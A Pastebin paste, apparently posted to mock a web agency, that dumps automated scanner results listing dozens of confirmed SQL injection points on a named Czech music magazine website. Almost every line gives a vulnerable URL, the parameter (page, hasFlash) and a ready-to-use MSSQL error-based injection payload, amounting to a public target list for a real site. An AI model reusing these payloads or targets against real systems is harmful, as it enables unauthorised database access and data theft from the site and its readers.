Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- +++++++++++++++++++++++
- Sherwood Internet agency i know is a tough kick in the form of critical errors in the music magazine :)
- --- >> http://www.sherwood.cz
- +++++++++++++++++++++++
- [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/casopis/?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/?page=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/video/?page='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: page
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/koncem-mesice-vyda-vydavatelstvi-emi-jedinecne-album-soliteri/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- URL: http://www.rockandpop.cz/zpravy/domaci/koncem-mesice-vyda-vydavatelstvi-emi-jedinecne-album-soliteri/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/poznejte-obycejny-den-na-turne-prostrednictvim-noveho-videoklipu-the-ghost-inside/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/poznejte-obycejny-den-na-turne-prostrednictvim-noveho-videoklipu-the-ghost-inside/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/britska-zpevacka-jessie-ware-se-tesi-na-evropske-turne/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/britska-zpevacka-jessie-ware-se-tesi-na-evropske-turne/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/prazsky-vyber-zverejnil-jmena-hostu-jarniho-turne/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/prazsky-vyber-zverejnil-jmena-hostu-jarniho-turne/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/marilyn-manson-zkolaboval-v-prubehu-koncertu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/marilyn-manson-zkolaboval-v-prubehu-koncertu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/americti-confide-se-hlasi-ze-studia-a-pridavaji-ochutnavku/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/americti-confide-se-hlasi-ze-studia-a-pridavaji-ochutnavku/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/o5-a-radecek-opici-turne-zacne-koncertem-v-primem-prenosu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/o5-a-radecek-opici-turne-zacne-koncertem-v-primem-prenosu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/monkey-business-vydaji-nove-album-a-vyjedou-na-turne/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/monkey-business-vydaji-nove-album-a-vyjedou-na-turne/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/chiki-liki-tu-a:-1000-koncertov-15-krajin-a-230-miest/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/domaci/chiki-liki-tu-a:-1000-koncertov-15-krajin-a-230-miest/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/bruno-mars-predstavuje-klip-k-singlu-when-i-was-your-man/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/bruno-mars-predstavuje-klip-k-singlu-when-i-was-your-man/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/kanadsti-billy-talent-prichazeji-s-novym-videoklipem/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/zpravy/zahranicni/my-chemical-romance-streamuji-posledni-cast--conventional-weapons/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/live/young-guns-your-demise-criminal-colection-9-11-rock-cafe-praha/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/foto/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/tribal-theory-funky-rock-n-roll-ze-zapadnich-cech/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/tribal-theory-funky-rock-n-roll-ze-zapadnich-cech/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/overhype-nadejna-kapela-z-brna/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Impact
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/overhype-nadejna-kapela-z-brna/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/video/rock-pop-tv-jiz-brzy/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/video/rock-pop-tv-jiz-brzy/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/video/branit-ve-cteni-casopisu-rock-pop-se-nevyplaci/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/video/20-narozeniny-s-rock-pop-a-imodium/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- ImpactSeverity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/video/20-narozeniny-s-rock-pop-a-imodium/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name:
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.rockandpop.cz/recenze/green-day-uno-dos-tre/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: hasFlash
- Parameter Type: Querystring
